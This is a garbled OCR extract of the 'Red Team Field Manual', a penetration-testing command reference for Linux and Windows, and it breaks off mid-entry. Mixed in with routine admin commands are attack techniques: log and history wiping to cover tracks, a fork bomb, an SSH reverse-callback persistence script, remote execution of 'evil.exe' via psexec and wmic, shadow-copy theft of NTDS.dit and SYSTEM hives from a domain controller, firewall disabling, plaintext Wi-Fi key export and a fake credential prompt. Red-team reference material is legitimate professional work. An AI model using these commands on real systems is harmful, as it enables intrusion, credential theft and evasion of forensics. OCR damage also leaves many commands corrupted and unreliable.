Red Team Field Manual RTFM.pdf

:E
j
'-
9 rz1 H
~

0::
C
)

>-1
u
,...,
E
-
J':q
!
=

z
>

~

E-4
iXl
Q

&!
RTFM. Copyright © 2013 by Ben Clark
All rights reserved. No part of this work may be reproduced or transmitted
in any form or by any means, without prior written permission of the
copyright owner.
ISBN-10: 1494295504
ISBN-13: 9 7 8-1494295509
Technical Editor: Joe Vest
Graphic: Joe Vest
Product and company names mentioned herein may be the trademarks of their
respective owners. Rather than use a trademark symbol with every occurrence
of a trademarked name, the author uses the names only in an editorial
fashion, with no intention of infringement of the trademark. Use of a term
in this book should not be regarded as affecting the validity of any
trademark or service mark.
The information in this book is distributed 11 as is 11 • While everj precaution
was taken to ensure the accuracy of the material, the author assumes no
responsibility or liability for errors or omissions, or for damages
resulting from the use of the information contained herein.
TABLE OF CONTENTS
*NIX ................................................................................................................................................................. 4
WINDOWS •••••..••.•.•••••••••••.•••••••••••...••..•••..•••.••.••...••..••••...•••.••.••••.•••••.••..••.•••.••••.•••.••...•••••..••..••••••..••••.••.••.•••••• 14
NETWORKING •••••..•••••••..••...••...••..••••.••••••••••.••••.•••..••••••.••••...•..••••••.•••••••••••.•••••••••.•••.••..••••••••••••••••••.•••••••••.••.•• 34
TIPS AND TRICKS ...••..•••..•••.••••••••..••••••.•••..••...•••••••••...•••.•••••••••••••.•••••.••.••••••..••••••••.•••.•••••••.••..••••••.••••••••.••.•..••• 42
TOOL SYNTAX •••••••••••••••••••••••.••••.••••..•••••.•••••••••••••..••••••.••••.•.••••••••.••••••••..•••••.••.•••••••.••..•••••••••••••••••••••••••••••••..• 50
WEB •••••..•••.••.•••••••.••..•••..••...••..•••..••..••••••.•••...••..•••.••••••..••••..••.•••.••••••••.•••••••.••.•••••.•••••••••••..•••••••••..••.•••••••.••.••.• 66
DATABASES •••••••.•••••••...••..•••..••.•.•••••..••...•••.•••••.••••..••.•.••••.•...••.•••••.••.•••••..•••••.••.•••••..•••..•••••••••••••••••.•••••••••••••.•. 72
PROGRAMMING ............................................................................................................................................ 76
WIRELESS ..•••••••..•••••••..•••..•••..••...•••••••••...••..•••..•••••..••...••••.....••.••••.••..••••••.•••••.••.••••••.•••..•••••••••••••••••••••••••••••••.•. 84
REFERENCES •••..•••••••••••••.••••••.•••..••...•••••.•••..•••..••...•••••..••..••.•••••..•••••.••.•••••••••••••••••••..•••••..•••..••••.•••••••..••.•••••••••• 94
INDEX ••••...••••••••••••..••...••..•••..•••••••••••.••...••..•••••••••••.•••..••••••.•••••••••..•..•••••..•••••.••.•••.••••••..•••••••••••••••••.•••••••••••••.•. 95
3
THS Bonus Material added by 0E800
Nmap Cheat Sheet
Nmap Cheat Sheet 2
Wireshark Display Filters
Common Ports List
Google Cheat Sheet
Scapy
TCPDUMP
NAT
QoS
IPv4
IPv6
'"Hili! '-.-.j-'#'!lli-,··~ f''{-• w(' •-'lrt''MMfW- '-)'''M«V#ffr'ZW¥11i!f--wiiMfM'M'WMi'""f%ffi!I'''IW""liH;:-~@ H~51~M «;~"'
LINUX NETWORK COMMANDS
watch ss -tp
netstat -ant
netstat -tulpn
lsof -i
smb:// ip /share
share user x.x.x.x c$
smbclient -0 user\\\\ ip \\ share
ifconfig eth# ip I cidr
ifconfig ethO:l ip I cidr
route add default gw gw lp
ifconfig eth# mtu [size]
export l1AC=xx: XX: XX: XX: XX: XX
ifconfig int hw ether t~AC
macchanger -m l1AC int
iwlist int scan
dig -x ip
host ip
host -t SRV service tcp.url.com
dig @ ip domain -t AXrR
host -1 domain namesvr
ip xfrm state list
ip addr add ip I cidr aev ethO
/var/log/messages I grep DHCP
tcpkill host ip and port port
echo "1" /proc/sys/net/ipv4/ip forward
echo ''nameserver x.x.x.x'' /etc7resolv.conf
Network connections
Tcp connections -anu=udp
Connections with PIDs
Established connections
Access windows smb share
Mount Windows share
Sl1B connect
Set IP and netmask
Set virtual interface
Set GW
Change t~TO size
Change t~AC
Change t~AC
Backtrack t~AC changer
Built-in wifi scanner
Domain lookup for IP
Domain lookup for IP
Domain SRV lookup
DNS Zone Xfer
DNS Zone Xfer
Print existing VPN kejs
Adds 'hidden' interface
List DHCP assignments
Block ip:port
Turn on IP Forwarding
Add DNS Server
LINUX SYSTEM INFO
id
w
who -a
last -a
ps -ef
df -h
uname -a
mount
getent passwd
PATH~$PATH:/home/mypath
kill pid
cat /etc/issue
cat /etc/'release'
cat /proc/version
rpm --querJ -all
rpm -ivh ) .rpm
dpkg -get-selections
dpkg -I '.deb
pkginfo
which tscsh/csh/ksh/bash
chmod -so tcsh/csh/ksh
5
Current username
Logged on users
User information
Last users logged on
Process listing (top)
Disk usage (free)
Kernel version/CPU info
t1ounted file Sjstems
Show list of users
Add to PATH variable
Kills process with pid
Show OS info
Show OS version info
Show kernel info
Installed pkgs (Redhat)
Install RPM (-e~remove)
Installed pkgs (Obuntu)
Install DEB (-r~remove)
Installed pkgs (Solaris)
Show location of executable
Disable shell , force bash
LINUX UTILITY COMMANDS
wget http:// url -0 url.txt -o /dev/null
rdesktop ip
scp /tmp/file [email protected]:/tmp/file
scp user@ remoteip :/tmp/file /tmp/file
useradd -m user
passwd user
rmuser unarne
script -a outfile
apropos subject
history
! num
Grab url
Remote Desktop to ip
Put file
Get file
Add user
Change user password
Remove user
Record shell : Ctrl-D stops
Find related command
View users command history
Executes line # in history
LINUX FILE COMMANDS
diff filel file2
rm -rf dir
shred -f -u file
touch -r ref file file
touch -t YYYY11t1DDHHSS file
sudo fdisk -1
mount /dev/sda# /mnt/usbkey
md5sum -t file
echo -n "str 11 I md5sum
shalsum file
sort -u
grep -c ''str'' file
tar cf file.tar files
tar xf file.tar
tar czf file.tar.gz files
tar xzf file.tar.gz
tar cjf file.tar.bz2 files
tar xjf file.tar.bz2
gzip file
gzip -d file. gz
upx -9 -o out.exe orig.exe
zip -r zipname.zip \Directory\'
dd skip=lOOO count=2000 bs=S if=file of=file
split -b 9K \ file prefix
awk 'sub("$"."\r")' unix.txt win.txt
find -i -name file -type '.pdf
find I -perm -4000 -o -perm -2000 -exec ls -
ldb {) \;
dos2unix file
file file
chattr (+/-)i file
Compare files
Force delete of dir
Overwrite/delete file
t1atches ref_ file timestamp
Set file timestamp
List connected drives
t1ount USB key
Compute md5 hash
Generate md5 hash
SHAl hash of file
Sort/show unique lines
Count lines w/ ''str''
Create .tar from files
Extract .tar
Create .tar.gz
Extract .tar.gz
Create .tar.bz2
Extract .tar.bz2
Compress/rename file
Decompress file.gz
UPX packs orig.exe
Create zip
Cut block 1K-3K from file
Split file into 9K chunks
Win compatible txt file
Find PDF files
Search for setuid files
Convert to ~nix format
Determine file type/info
Set/Unset immutable bit
LINUX ~SC COMMANDS
unset HISTFILE
ssh user@ ip arecord - I aplay -
gee -o outfile myfile.c
init 6
cat /etc/ 1 syslog 1 .conf 1 grep -v ''"#''
grep 'href=' file 1 cut -d"/" -f3 I grep
url lsort -u
dd if=/dev/urandom of= file bs=3145"28
count=lOO
Disable history logging
Record remote mic
Compile C,C++
Reboot (0 = shutdown)
List of log files
Strip links in url.com
l1ake random 311B file
LINUX II COVER YOUR TRACKS II COMMANDS
echo "" /var/log/auth.log
echo '''' -/.bash history
rrn -/.bash histor/ -rf
history -c
export HISTFILESIZE=O
export HISTSIZE=O
unset HISTFILE
kill -9 $$
ln /dev/null -/.bash_historj -sf
Clear auth.log file
Clear current user bash history
Delete .bash_history file
Clear current session history
Set historj max lines to 0
Set histroy max commands to 0
Disable history logging (need to
logout to take effect)
Kills current session
Perrnanentlj send all bash history
commands to /dev/null
LINUX FILE SYSTEM STRUCTURE
/bin
/boot
/dev
/etc
/horne
/lib
/opt
/proc
/root
/sbin
/trnp
/usr
/var
/etc/shadow
/etc/passwd
/etc/group
/etc/rc.d
/etc/init.d
/etc/hosts
/etc/HOSTNAl1E
/etc/network/interfaces
/etc/profile
/etc/apt/sources.list
/etc/resolv.conf
/horne/ user /.bash historj
/usr/share/wireshark/rnanuf
-/.ssh/
/var/log
/var/adrn
/var/spool/cron
/var/log/apache/access.log
/etc/fstab
User binaries
Boot-up related files
Interface for system devices
Sjstern configuration files
Base directory for user files
Critical software libraries
Third party software
Sjstern and running programs
Home directory of root user
System administrator binaries
Temporary files
Less critical files
Variable Sjstern files
LINUX FILES
Local users' hashes
Local users
Local groups
Startup services
Service
Known hostnames and IPs
Full hostnarne with domain
Network configuration
System environment variables
Ubuntu sources list
Narneserver configuration
Bash history (also /root/)
Vendor-t1AC lookup
SSH keystore
System log files (most Linux)
System log files (Unix)
List cron files
Apache connection log
Static file system info
LINUX SCRIPTING
PING SWEEP
for x in {1 .. 254 .. l};do ping -c 1 l.l.l.$x lgrep "64 b" lcut -d" "-f4
ips.txt; done
AUTOMATED DOMAIN NAME RESOLVE BASH SCRIPT
#!/bin/bash
echo "Enter Class C Range: i.e. 192.168.3"
read range
for ip in {1 .. 254 .. l};do
host $range.$ip lgrep 11 name pointer 11 lcut -d" 11 -fS
done
FORK BOMB (CREATES PROCESSES UNTIL SYSTEM "CRASHES")
: (){:I: & I;:
DNS REVERSE LOOKUP
for ip in {1 .. 254 .. 1}; do dig -x l.l.l.$ip I grep $ip dns.txt; done;
IP BANNING SCRIPT
#!/bin/sh
# This script bans any IP in the /24 subnet for 192.168.1.0 starting at 2
# It assumes 1 is the router and does not ban IPs .20, .21, .22
i=2
while
do
done
$i -le 253 l
if [ $i -ne 20 -a $i -ne 21 -a $i -ne 22 ]; then
echo "BANNED: arp -s 192.168.1.$i"
arp -s 192.168.1.$i OO:OO:OO:OO:OO:Oa
else
echo 11 IP NOT BANNED: 192.168.1.$i 1 .'.A~.'AJ..J.J,l!A.l.!J..J!AJ..AAAAJ.II
eChO 11.1} J A}. J, I A J. 11 A A .1. /.). J. I 1 J.} J. I A I I I.) 1 .I A).. A .l. J. J.} .I),).. J.}.}).. J. A A; J, J,. J.ll
fi
i='expr $i +1'
8
-;~"-- (':it'ieit#'r'filff I! . l • 'f -· ,. .. .. .. --·--·~
SSH CALLBACK
Set up script in crontab to callback ever} X minutes. Highlj recommend JOU
set up a generic user on red team computer (with no shell privs). Script
will use the private kej (located on callback source computer) to connect
to a public key (on red team computer). Red teamer connects to target via a
local SSH session (in the example below, use #ssh -p4040 localhost)
#!/bin/sh
# Callbac~: script located on callback source computer (target)
killall ssh /dev/null 2 &1
sleep 5
REMLIS-4040
REMUSR-user
HOSTS=''domainl.com domain2.com domain3.com''
for LIVEHOST in SHOSTS;
do
COUNT-S(ping -c2 $~!VEHOST I grep 'received' 1 awk -F',' ' ( print
$2 } ' awk ' ( print $1 I 'I
if [ [ $COUN7 -gt 0 ; ] ; then
ssh -R $(REMLIS}:localhost:22 -i
"/home/$(REMUSR}/.ssh/id rsa" -N $(LIVEHOST} -1 $(REMUSR}
:i
iptables-restore file
iptables -~ -v --line-numbers
iptables -F
IPTABLES
iptables -P INPUT/FORWARD/OUTPUT
ACCEPT/REJECT/DROP
iptables -A INPUT -i interface -m state --
state RELATED,ESTABLcSHED -j ACCEPT
iptables -D INPUT -
iptables -t raw -L -n
iptables -P INPUT DROP
ALLOW SSH ON PORT 22 OUTBOUND
counters) rules to stdout
Restore iptables rules
List all iptables rules with
affected and line numbers
Flush all iptables rules
Change default polic; for
rules that don't match rules
Allow established
connections on INPUT
Delete cth inbound rule
Increase throughput b;
turning off statefulness
Drop all packets
iptables -A OUTPUT -o iface -p tcp --dport 22 -m state --state
NEW,ESTABLISHED -j ACCEPT
iptables -A INPUT -i iface -p tcp --sport 22 -m state --state
ESTABLISHED -j ACCEPT
ALLOW ICMP OUTBOUND
iptacles -A OUTPUT -i iface
iptables -A INPUT -o iface
-p icmp --icmp-t;pe echo-request -j ACCEPT
-p icmp --icmp-tjpe echo-repl; -j ACCEPT
PORT FORWARD
echo "1" /proc/sjs/net/lpv4/lp forward
OR- SJSCtl net.lpv4.lp forward~1
iptables -t nat -A PREROUTING -p tcp -i ethO -j DNAT -d pivotip --dport
443 -to-destination attk 1p :443
iptables -t nat -A POSTROUTING -p tcp -i ethC -j SNAT -s target subnet
cidr -d attackip --dport 443 -to-source pivotip
iptables -t filter -I FORWARD 1 -j ACCEPT
ALLOW ONLY 1.1.1. 0/24, PORTS 80,443 AND LOG DROPS TO
/VAR/LOG/MESSAGES
iptables -A INPU~ -s 1.1.1.0/24 -m state --state RELATED,ESTAB~ISHED,NEW
-p tcp -m multipart --dports 80,443 -j ACCEPT
iptables -A INPUT -i ethO -m state --state RELATED,ESTABLISHED -j ACCEPT
iptables -P INPUT DROP
iptables -A OUTPUT -o ethO -j ACCEPT
iptables -A INPUT -i lo -j ACCEPT
iptables -A
iptables -N
iptables -A
iptables -A
iptables -A
OUTPUT -o lo -j ACCEPT
LOGGING
INPUT -j LOGGING
LOGGING -m limit --limit 4/min -j LOG --log-prefix "DROPPED "
LOGGING -j DROP
10
UPDATE-RC.D
• Check/change startup services
service --status-all
service service
service service
service service
update-rc.d -f
start
stop
status
service remove
update-rc.d service defaults
[+] Service starts at boot
[-] Service does not start
Start a service
Stop a service
Check status of a service
Remove a service start up cmd (-
f if the /etc/init.d start up
file exists I
Add a start up service
CHKCONFIG
• Available in Linux distributions such as Red Hat Enterprise Linux (RHEL),
CentOS and Oracle Enterprise Linux (OEL)
chkconfig --list
chkconfig service
chkconfig service
-list
on [--level 3]
chkconfig service off [--level 3]
e.g. chkconfig iptables off
SCREEN
List existing services and run
status
Check single service status
Add service [optional to add
level at which service runs]
Remove service
(C-a ~~ Control-a)
screen -S name
screen -ls
screen -r name
screen -S name
C-a
C-a d
C-a D D
C-a c
C-a C-a
C-a ' numlname
C-a "
C-a k
C-a S
C-a V
C-a tab
C-a X
C-a Q
-X cmd
11
Start new screen with name
List running screens
Attach to screen name
Send crnd to screen anrne
List keybindings (help)
Detach
Detach and logout
Create new window
Switch to last active window
Switch to window numlname
See windows list and change
Kill current window
Split display horizontally
Split display vertically
Jump to next display
Remove current region
Remove all regions but current
Xll
CAPTURE REMOTE Xll WINDOWS AND CONVERT TO JPG
xwd -display ip :0 -root -out /tmp/test.xpm
xwud -in /tmp/test1.xpm
convert /tmp/test.xpm -resize 1280x1024 /tmp/test.jpg
OPEN Xll STREAM VIEWING
xwd -display 1.1.1.1:0 -root -silent -out x11dump
Read dumped file with xwudtopnm or GIMP
TCPDUMP
CAPTURE PACKETS ON ETH0 IN ASCII AND HEX AND WRITE TO FILE
tcpdump -i ethO -XX -w out.pcap
CAPTURE HTTP TRAFFIC TO 2 . 2 . 2 . 2
tcpdump -i ethO port 80 dst 2.2.2.2
SHOW CONNECTIONS TO A SPECIFIC IP
tcpdump -i ethO -tttt dst 192.168.1.22 and not net 192.168.1.0/24
PRINT ALL PING RESPONSES
tcpdump -i ethO 'icmp[icmptype] == icmp-echoreply'
CAPTURE 50 DNS PACKETS AND PRINT TIMESTAMP
tcpdump -i ethO -c 50 -tttt 'udp and port 53'
NATIVE KALI COMMANDS
WMIC EQUIVALENT
wmis -U DOMAIN\ user % password II· DC cmd.exe /c command
MoUNT SMB SHARE
# Mounts to /mnt/share. For other options besides ntlmssp, man mount.cifs
mount.cifs // ip /share /mnt/share -o
user= user ,pass= pass ,sec=ntlrnssp,domain= domain ,rw
UPDATING KALI
apt-get update
apt-get upgrade
12
PFSENSE
pfSsh.php
pfSsh.php playback enableallowallwan
pfSsh.php playback enablesshd
pfctl -sn
pfctl -sr
pfctl -sa
viconfig
rm /tmp/config.cache
/etc/rc.reload_all
SOLARIS
ifconfig -a
netstat -in
ifconfig -r
ifconfig ethO dhcp
ifconfig ethO plumb up ip netmask nmask
route add default ip
logins -p
svcs -a
prstat -a
svcadm start ssh
inetadm -e telnet (-d for disable)
prtconf I grep Memorj
iostat -En
showrev -c /usr/bin/bash
shutdown -i6 -gO -y
dfmounts
smc
snoop -d int -c pkt # -o results.pcap
/etc/vfstab
/var/adm/logging
/etc/default/'
/etc/system
/var/adm/messages
/etc/auto '
/etc/inet/ipnodes
13
pfSense Shell System
Allow all inbound WAN
connections (adds to visible
rules in WAN rules)
Enable ssh inbound/outbound
Show NAT rules
Show filter rules
Show all rules
Edit config
Remove cached (backup)
config after editing the
current running
Reload entire config
List of interfaces
List of interface
Route listing
Start DHCP client
Set IP
Set gateway
List users w/out passwords
List all services w/ status
Process listing (top)
Start SSH service
Enable telnet
Total physical memory
Hard disk size
Information on a binary
Restart system
List clients connected NFS
t1anagement GUI
Packet capture
File system mount table
Login attempt log
Default settings
Kernel modules & config
Syslog location
Automounter config files
IPv4/IPv6 host file
NT 3.1
NT 3.5
NT 3.51
NT 4.0
NT 5.0
WINDOWS VERSIONS
Windows NT 3.1 (All)
Windows NT 3.5 (All)
Windows NT 3.51 (All)
Windows NT 4.0 (All)
Windows 2000 (All)
NT 5.1
NT 5.2
Windows XP (Home, Pro, MC, Tablet PC, Starter, Embedded)
Windows XP (64-bit, Pro 64-bit)
Windows Server 2003 & R2 (Standard, Enterprise)
Windows Home Server
NT 6.0 Windows Vista (Starter, Home, Basic, Home Premium,
Business, Enterprise, Ultimate)
NT 6.1
NT 6.2
Windows Server 2008 (Foundation, Standard, Enterprise)
Windows ~ (Starter, Home, Pro, Enterprise, Ultimate)
Windows Server 2008 R2 (Foundation, Standard, Enterprise)
Windows 8 (x86/64, Pro, Enterprise, Windows RT (ARM))
Windows Phone 8
Windows Server 2012 (Foundation, Essentials, Standard)
WINDOWS FILES
%SYSTEt~ROOT%
%SYSTEMROOT%\System32\drivers\etc\hosts
%SYSTEMROOT%\System32\drivers\etc\networks
%SYSTEt~ROOT% \ system32 \ config\SAM
%SYSTEMROOT%\repair\SAt~
%SYSTEMROOT%\System32\config\RegBack\SAt~
%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%ALLUSERSPROFILE%\Start Menu\Programs\Startup\
%USERPROFILE%\Start Menu\Programs\Startup\
%SYSTEMROOT%\Prefetch
Typically C:\Windows
DNS entries
Network settings
User & password hashes
Backup copy of SAt~
Backup copy of SAt~
Application Log
Security Log
Startup Location
Startup Location
Prefetch dir (EXE logs)
STARTUP DIRECTORIES
WINDOWS NT 6.1,6.0
# All users
%SystemDrive%\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
# Specific users
%SystemDrive%\Users\%UserName%\AppData\Roaming\Microsoft\Windows\Start
Menu\Programs\Startup
WINDOWS NT 5.2, 5.1, 5.0
%SystemDrive%\Documents and Settings\All Users\Start Menu\Programs\Startup
WINDOWS 9x
%SystemDrive%\wmiOWS\Start Menu\Programs\Startup
WINDOWS NT 4. 0, 3. 51, 3. 50
%SystemDrive%\WINNT\Profiles\All Users\Start Menu\Programs\Startup
15
WINDOWS SYSTEM INFO COMMANDS
ver
sc query state=all
tasklist /svc
tasklist /m
tasklist /S ip /v
taskkill /PID pid /F
systeminfo /S ip /U domain\user /P Pwd
reg query\\ ip \ RegDomain \ Key /v
Value
reg query HKLM /f password /t REG SZ /s
fsutil fsinfo drives -
dir /a /s /b c:\'.pdf'
dir /a /b c:\windows\kb'
findstr /si password' .txt I •.xmll •.xls
tree /F /A c:\ tree.txt
reg save HKLl~\Security security.hive
echo %USERNAl~E%
Get OS version
Show services
Show processes & services
Show all processes & DLLs
Remote process listing
Force process to terminate
Remote system info
Query remote registry,
/s=all values
Search registrj for password
List drives •must be admin
Search for all PDFs
Search for patches
Search files for password
Directory listing of C:
Save securitj hive to file
Current user
WINDOWS NET /DOMAIN COMMANDS
net view /domain
net view /domain: [t~YDOHAIN]
net user /domain
net user user pass /add
net localgroup "Administrators" user /add
net accounts /domain
net localgroup "Administrators"
net group /domain
net group "Domain Adrnins" /domain
net group "Domain Controllers 11 /domain
net share
net session I find I "\\"
net user user /ACTIVE:jes /domain
net user user '' newpassword '' /domain
net share share c:\share
/GRANT:Everyone,FULL
Hosts in current domain
Hosts in [l~YDOl1AIN]
All users in current domain
Add user
Add user to Administrators
Domain password policy
List local Admins
List domain groups
List users in Domain Adrnins
List DCs for current domain
Current SMB shares
Active SHB sessions
Unlock domain user account
Change domain user password
Share folder
WINDOWS REMOTE COMMANDS
tasklist /S ip /v
systeminfo /S ip /U domain\user /P Pwd
net share \\ ip
net use \\ ip
net use z: \\ ip \share password
/user: D0l1AIN\ user
reg add \\ ip \ regkej \ value
sc \\ ip create service
binpath=C:\Windows\System32\x.exe start=
auto
xcopy /s \\ ip \dir C:\local
shutdown /m \\ ip /r /t 0 /f
16
Remote process listing
Remote systeminfo
Shares of remote computer
Remote filesystem (IPC$)
l~ap drive, specified
credentials
Add registry key remotely
Create a remote service
(space after start=)
Copy remote folder
Remotely reboot machine
WINDOWS NETWORK COMMANDS
ipconfig I all
ipconfig /displaydns
netstat -ana
netstat -anop tcp 1
netstat -ani findstr LISTENING
route print
arp -a
nslookup, set type=any, ls -d domain
results.txt, exit
nslookup -type=SRV _www._tcp.url.com
tftp -I ip GET remotefile
netsh wlan show profiles
netsh firewall set opmode disable
netsh wlan export profile folder=. key=clear
netsh interface ip show interfaces
netsh interface ip set address local static
ip nmask gw ID
netsh interface ip set dns local static ip
netsh interface ip set address local dhcp
IP configuration
Local DNS cache
Open connections
Netstat loop
LISTENING ports
Routing table
Known l1ACs (ARP table I
DNS Zone Xfer
Domain SRV lookup ( ldap,
kerberos, sip)
TFTP file transfer
Saved wireless profiles
Disable firewall ('Old)
Export wifi plaintext pwd
List interface IDs/MTUs
Set IP
Set DNS server
Set interface to use DHCP
WINDOWS UTILITY COMMANDS
type
del
file
path\' .• /a /s /q /f
find /I ''str'' filename
command I find /c /v
at HH:Ml1 file [args] (i.e. at 14:45 cmd
/c)
runas /user: user " file [args] 11
restart /r /t 0
tr -d '\15\32' win.txt unix.txt
makecab file
Wusa.exe /uninstall /kb: ###
cmd.exe "wevtutil qe Application /c:40
/f:text /rd:true"
lusrrngr.rnsc
services.msc
taskmgr.exe
secpool.rnsc
eventvwr.rnsc
1?
Display file contents
Forceably delete all files
in path
Find "str"
Line count of
Schedule file
cmd output
to run
Run file as user
Restart now
Removes CR & 'Z ('nix)
Native compression
Uninstall patch
CLI Event Viewer
Local user manager
Services control panel
Task manager
Security policy manager
Event viewer
MISC. COMMANDS
LoCK WORKSTATION
rundll32.dll user32.dll LockWorkstation
DISABLE WINDOWS FIREWALL
netsh advfirewall set currentprofile state off
netsh advfirewall set allprofiles state off
NATIVE WINDOWS PORT FORWARD ( * MUST BE ADMIN)
netsh interface portproxy add v4tov4 listenport=3000
listenaddress=l.l.l.l connectport=4000 connectaddress=2.2.2.2
#Remove
netsh interface portproxy delete v4tov4 listenport=3000
listenaddress=l.l.l.l
RE-ENABLE COMMAND PROMPT
reg add HKCU\Software\Policies\t1icrosoft\Windows\System /v DisableCHD /t
REG DWORD /d 0 /f
PSEXEC
EXECUTE FILE HOSTED ON REMOTE SYSTEM WITH SPECIFIED CREDENTIALS
psexec /accepteula \\ targetiP -u domain\user -p password -c -f
\\ smbiP \share\file.exe
RUN REMOTE COMMAND WITH SPECIFIED HASH
psexec /accepteula \\ ip -u Domain\user -p Lt1
c:\Progra-1
RUN REMOTE COMMAND AS SYSTEM
psexec /accepteula \\ ip -s cmd.exe
18
NTLH cmd.exe /c dir
TERMINAL SERVICES (RDP)
START RDP
1. Create regfile.reg file with following line in it:
HKEY LOCAL t1ACHINE\SYSTEH\CurrentControlSet \Control\ TerminalService
2. "fDe~yTSCo~nections"=dword: 00000000
3. reg import reg file. reg
4. net start ''terrnservice''
5. sc config terrnservice start= auto
6. net start terrnservice
--OR-
reg add "HKEY LOCAL t1ACHINE\SYSTEH\CurentControlSet\Control \Terminal
Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
TUNNEL RDP OUT PORT 443 (MAY NEED TO RESTART TERMINAL SERVICES)
REG ADD "HKLt1\System\CurrentControlSet\Control \Terminal
Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 443 /f
DISABLE NETWORK LEvEL AUTHENTICATION 1 ADD FIREWALL EXCEPTION
reg add "HKEY LOCAL t1ACHINE\SYSTEt1\CurentControlSet\Control \Terminal
Server\WinStations\RDP-TCP" /v UserAuthentication /t REG_DWORD /d "0" /f
netsh firewall set service type = remotedesktop mode = enable
IMPORT A SCHEDULE TASK FROM AN "EXPORTED TASK" XML
schtasks.exe /create /tn t1yTask /xml "C:\l1yTask.xml" /f
19
wmic [alias] get /?
wmic [alias] call /?
wmic process list full
wmic startupwmic service
wmic ntdomain list
wmic qfe
WMIC
wrnic process call create "process name"
wmic process where name="process" call
terminate
wmic logicaldisk get description,name
wmic cpu get DataWidth /format:list
WMIC [ALIAS] [WHERE] [CLAUSE]
List all attributes
Callable methods
Process attributes
Starts wmic service
Domain and DC info
List all patches
Execute process
Terminate process
View logical shares
Display 32 I I 64 bit
[alias] == process, share, startup, service, nicconfig, useraccount, etc.
[where] ==where (name="cmd.exe"), where (parentprocessid!=[pid]"), etc.
[clause] ==list [fulllbrief], get [attribl, attrib2], call [method],
delete
EXECUTE FILE HOSTED OVER SMB ON REMOTE SYSTEM WITH SPECIFIED
CREDENTIALS
wmic /node: targetiP /user:domain\user /password:password process call
create "\ \ smbiP \share\evil.exe"
UNINSTALL SOFTWARE
wmic product get name /value # Get software names
wmic product where name= 11 XXX" call uninstall /nointeractive
REMOTELY DETERMINE LOGGED IN USER
wmic /node:remotecomputer computersystern get username
~OTE PROCESS LISTING EVERY SECOND
wmic /node:machinename process list brief /every:l
~TELY START RDP
wmic /node:"machinename 4" path Win32_TerminalServiceSetting where
AllowTSConnections=''O'' call SetAllowTSConnections ''1''
LIST NUMBER OF TIMES USER HAS LOGGED ON
wmic netlogin where (name like "%adm%") get numberoflogons
SEARCH FOR SERVICES WITH UNQUOTED PATHS TO BINARY
wmic service get narne,displayname,pathnarne,startrnode lfindstr /i nauton
lfindstr /i /v 11 C:\windows\\'' lfindstr /i /v 111111
20
-------~---- '1 -vt t• -r Wfrl-iriWHfif ';+-:,i·~ilw:oo¢:M y m"ih2ci$$i
VOLUME SHADOW COPY
1. wmic /node: DC IP /user:"DOI1AIN\user" /password:"PASS 11 process
call create "cmd /c vssadmin list shadows 2 &1
c:\temp\output.txt"
If anJ copies alread1 ex~st then exfil, otherwise create using
following commands. Check output.txt for anJ errors
2. wmic /node: DC IP /Jser: 11 D0l1AIN\u.ser" /password: 11 PASS 11 process
call create "cmd /c vssadmin create shadow /for=C: 2 &1
C:\temp\output.txt"
3. wmic /node: DC IP /user: 11 DOHAIN\user" /password:"PASS" process
call create "cmd /c copJ
\\?\GLOBALROOT\Device\HarddiskVol~meShadowCopy1\Windows\System32\co
nfig\SYSTEM C:\temp\system.hive 2 &1 C:\temp\output.txt"
4. wmic /node: DC IP /user: "DOl'.llUN\user" /password: 11 PASS" process
call create ''crnd /c copJ
\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyc\NTDS\NTDS.dit
C:\temp\ntds.dit 2 &1 C:\temp\output.txt"
Step bj step instructions o~ roorn362.com for step below
5. From Linux, download and run ntdsxtract and libesedb to export
tashes or other domain information
a. Additional instructions found under the VSSOW~ section
b. ntdsx~ract- http://www.ntdsxtract.com
c. libesedb- http://code.google.com/p/libesedb/
21
get-content file
get-help command -examples
get-command ' string '
get-service
POWERS HELL
get-wmiobject -class win32 service
$PSVesionTable
powershell.exe -version 2.0
get-service measure-object
get-psdrive
get-process select -expandproperty name
get-help ' -parameter credential
get-wmiobject -list -'network
(Net.DNS]: :GetnostEntry(" ip "I
displaJs file contents
Shows examples of command
Searches for cmd string
Displajs services (stop-
service, start-service)
Displays services, but takes
alternate credentials
DisplaJ powershell version
Run powershell 2.0 from 3.0
Returns # of services
Returns list of PSDrives
Returns only names
Cmdlets that take creds
Available WMI network cmds
DNS Lookup
CLEAR SECURITY & APPLCIATION EVENT LOG FOR REMOTE SERVER(S~Ol)
Get-EventLog -list
Clear-EventLog -logname Application, Security -computername SVR01
EXPORT OS INFO INTO CSV FILE
Get-WmiObject -class win32 operatingsjstem I select -property 1 1 export-
csv c:\os.txt
LIST RUNNING SERVICES
Get-Service I where object {$ .status -eq ''Running''}
PERSISTENT PSDRIVE TO REMOTE FILE SHARE:
New-PSJrive -Persist -PSProvider FileSjstem -Root \\1.1.1.1\tools -Name i
RETURN FILES WITH WRITE DATE PAST 8/2 0
Get-Childitem -Path c:\ -Force -Rec~rse -Filter '.log -ErrorAction
Silentl~Con~inue I where {$ .LastWriteTime -gt ''2012-08-20''}
FILE DOWNLOAD OVER HTTP
(new-object sjstem.net.webclient) .downloadFile(''url'',''dest'')
TCP PORT CONNECTION (SCANNER)
$ports=(#,#,#) ;$ip="x.x.x.x";foreach ($port in $ports) {trJ($socket=New-
object Sjste~.Net.Sockets.TCPClient($ip,$port); }catch(};if ($socket -eq
$NULL) (echo $ip":"$port"- Closed";}else(echo $ip":"$port"- Open";$socket
=$NULL;}}
PING WITH 500 MILLISECOND TIMEOUT
$ping = New-Object Sjstex.Net.Networkinformation.ping
$ping.Send('' ip '',5JO)
22
BASIC AUTHENTICATION POPUP
powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass
$Host.UI.PromptForCredential( 11 title ", 11 message 11 1 11 user" 11 domain")
RUN EXE EVERY 4 HOURS BETWEEN AUG 8-11 , 2 013 AND THE HOURS OF
0800-1700 (FROM CMo. EXE)
powershell. exe -Command "do {if ((Get-Date -format yyyyl1l1dd-HHmm) -match
'201308 ( 0 [ 8-9] 11 [0-1])- I 0 [ 8-9] 11 [ o-c]) [ 0-5] [ 0-9]') {Start-Process -
WindowStyle Hidden "C:\Temp\my.exe";Start-Sleep -s 14400))while(1)"
POWERSHELL RUNAS
$pw ~ convertto-securestring -string "PASSWORD" -asplaintext -force;
